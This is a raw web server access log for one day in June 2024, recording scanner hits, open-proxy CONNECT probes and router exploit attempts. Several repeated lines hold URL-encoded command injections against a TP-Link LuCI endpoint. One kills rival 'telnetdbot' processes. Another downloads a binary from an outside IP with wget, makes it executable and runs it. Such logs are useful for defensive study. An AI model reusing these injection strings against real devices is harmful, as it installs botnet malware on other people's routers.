147.185.132.159 - - [29/Jun/2024:00:52:03 +0200] "-" 400 1930 147.185.132.159 - - [29/Jun/2024:00:52:03 +0200] "-" 400 1930 78.108.177.51 - - [29/Jun/2024:01:01:06 +0200] "GET / HTTP/1.0" 200 1895 111.7.100.32 - - [29/Jun/2024:01:24:12 +0200] "GET / HTTP/1.1" 200 1895 45.15.17.3 - - [29/Jun/2024:01:24:22 +0200] "GET / HTTP/1.1" 200 1895 123.160.221.130 - - [29/Jun/2024:01:24:23 +0200] "GET /favicon.ico HTTP/1.1" 404 729 36.99.136.137 - - [29/Jun/2024:01:27:37 +0200] "GET / HTTP/1.1" 200 1895 36.99.136.137 - - [29/Jun/2024:01:27:38 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [29/Jun/2024:01:33:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.83.197 - - [29/Jun/2024:02:00:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [29/Jun/2024:02:00:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [29/Jun/2024:03:19:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.111 - - [29/Jun/2024:03:33:54 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [29/Jun/2024:03:33:58 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [29/Jun/2024:03:33:58 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.83.197 - - [29/Jun/2024:03:35:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [29/Jun/2024:03:35:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 199.45.154.156 - - [29/Jun/2024:03:42:33 +0200] "-" 400 1930 45.156.129.50 - - [29/Jun/2024:04:23:03 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.109 - - [29/Jun/2024:04:26:13 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.110 - - [29/Jun/2024:04:26:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.107 - - [29/Jun/2024:04:26:50 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.113 - - [29/Jun/2024:04:26:57 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 41.76.195.90 - - [29/Jun/2024:04:52:44 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [29/Jun/2024:05:10:49 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.200 - - [29/Jun/2024:05:11:26 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 209.97.136.44 - - [29/Jun/2024:05:40:50 +0200] "-" 400 1930 195.208.128.91 - - [29/Jun/2024:05:46:03 +0200] "GET / HTTP/1.1" 200 1895 168.196.145.255 - - [29/Jun/2024:05:47:00 +0200] "GET / HTTP/1.1" 200 1895 194.50.16.17 - - [29/Jun/2024:05:47:58 +0200] "GET /cgi-bin/luci/ HTTP/1.1" 404 739 141.98.83.197 - - [29/Jun/2024:05:54:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [29/Jun/2024:05:54:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.224.128.63 - - [29/Jun/2024:06:02:14 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [29/Jun/2024:06:02:14 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [29/Jun/2024:06:02:14 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [29/Jun/2024:06:02:14 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 198.235.24.201 - - [29/Jun/2024:06:16:39 +0200] "GET / HTTP/1.1" 200 1895 46.101.88.229 - - [29/Jun/2024:06:37:30 +0200] "-" 400 1930 157.245.32.118 - - [29/Jun/2024:06:49:33 +0200] "-" 400 1930 167.94.145.104 - - [29/Jun/2024:06:54:22 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.104 - - [29/Jun/2024:06:54:26 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.104 - - [29/Jun/2024:06:54:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.71.65.1 - - [29/Jun/2024:07:04:23 +0200] "-" 400 1930 167.71.65.1 - - [29/Jun/2024:07:04:23 +0200] "-" 400 1930 167.71.65.1 - - [29/Jun/2024:07:04:23 +0200] "GET / HTTP/1.1" 200 1895 167.71.65.1 - - [29/Jun/2024:07:04:23 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 162.142.125.200 - - [29/Jun/2024:07:55:19 +0200] "GET / HTTP/1.1" 200 1895 162.142.125.200 - - [29/Jun/2024:07:55:23 +0200] "GET / HTTP/1.1" 200 1895 162.142.125.200 - - [29/Jun/2024:07:55:24 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.128.232.200 - - [29/Jun/2024:08:06:03 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [29/Jun/2024:08:13:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 31.46.43.150 - - [29/Jun/2024:08:15:38 +0200] "GET / HTTP/1.0" 200 1895 198.235.24.225 - - [29/Jun/2024:08:53:36 +0200] "GET / HTTP/1.1" 200 1895 147.185.132.132 - - [29/Jun/2024:09:11:09 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [29/Jun/2024:09:14:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.98 - - [29/Jun/2024:09:19:30 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [29/Jun/2024:09:19:33 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [29/Jun/2024:09:19:33 +0200] "GET /favicon.ico HTTP/1.1" 404 729 157.245.114.64 - - [29/Jun/2024:10:12:18 +0200] "-" 400 1930 157.245.114.64 - - [29/Jun/2024:10:12:18 +0200] "-" 400 1930 157.245.114.64 - - [29/Jun/2024:10:12:19 +0200] "GET / HTTP/1.1" 200 1895 157.245.114.64 - - [29/Jun/2024:10:12:19 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 103.237.87.5 - - [29/Jun/2024:10:31:58 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804 94.156.8.2 - - [29/Jun/2024:10:55:03 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 87.121.69.27 - - [29/Jun/2024:11:00:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 102.36.196.108 - - [29/Jun/2024:11:01:01 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.30 - - [29/Jun/2024:11:55:44 +0200] "-" 400 1930 172.245.131.82 - - [29/Jun/2024:12:02:35 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [29/Jun/2024:12:55:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.131 - - [29/Jun/2024:13:10:47 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 5.58.33.187 - - [29/Jun/2024:13:45:48 +0200] "GET / HTTP/1.1" 200 1895 91.238.181.71 - - [29/Jun/2024:13:51:50 +0200] "-" 400 1930 172.206.142.34 - - [29/Jun/2024:14:30:35 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [29/Jun/2024:15:25:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [29/Jun/2024:15:30:06 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 206.168.32.110 - - [29/Jun/2024:15:52:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [29/Jun/2024:15:52:08 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [29/Jun/2024:15:52:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.82.160.69 - - [29/Jun/2024:16:24:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [29/Jun/2024:17:35:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [29/Jun/2024:17:36:16 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 48.216.196.127 - - [29/Jun/2024:18:43:52 +0200] "-" 400 1930 80.75.212.75 - - [29/Jun/2024:18:50:11 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 185.191.126.213 - - [29/Jun/2024:19:42:35 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [29/Jun/2024:19:59:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.133 - - [29/Jun/2024:20:16:18 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 104.168.70.165 - - [29/Jun/2024:20:30:44 +0200] "GET / HTTP/1.1" 200 1895 141.98.83.197 - - [29/Jun/2024:20:57:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [29/Jun/2024:20:57:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 172.202.246.89 - - [29/Jun/2024:21:16:22 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [29/Jun/2024:21:43:20 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [29/Jun/2024:21:43:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.224.128.63 - - [29/Jun/2024:21:43:20 +0200] "GET / HTTP/1.1" 200 1895 185.224.128.63 - - [29/Jun/2024:21:43:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 185.242.226.25 - - [29/Jun/2024:21:50:10 +0200] "GET / HTTP/1.1" 200 1895 179.60.147.144 - - [29/Jun/2024:22:20:23 +0200] "-" 400 1930 45.128.232.200 - - [29/Jun/2024:22:27:09 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [29/Jun/2024:22:34:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.156.129.56 - - [29/Jun/2024:23:09:03 +0200] "GET /owncloud/status.php HTTP/1.1" 404 741 45.156.129.56 - - [29/Jun/2024:23:09:06 +0200] "GET /status.php HTTP/1.1" 404 728 78.108.177.51 - - [29/Jun/2024:23:21:18 +0200] "GET / HTTP/1.0" 200 1895 206.168.32.107 - - [29/Jun/2024:23:23:44 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [29/Jun/2024:23:23:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [29/Jun/2024:23:23:47 +0200] "GET /favicon.ico HTTP/1.1" 404 729 179.60.147.144 - - [29/Jun/2024:23:29:23 +0200] "-" 400 1930 198.235.24.182 - - [29/Jun/2024:23:48:32 +0200] "GET / HTTP/1.1" 200 1895 205.210.31.167 - - [29/Jun/2024:23:50:27 +0200] "GET / HTTP/1.0" 200 1895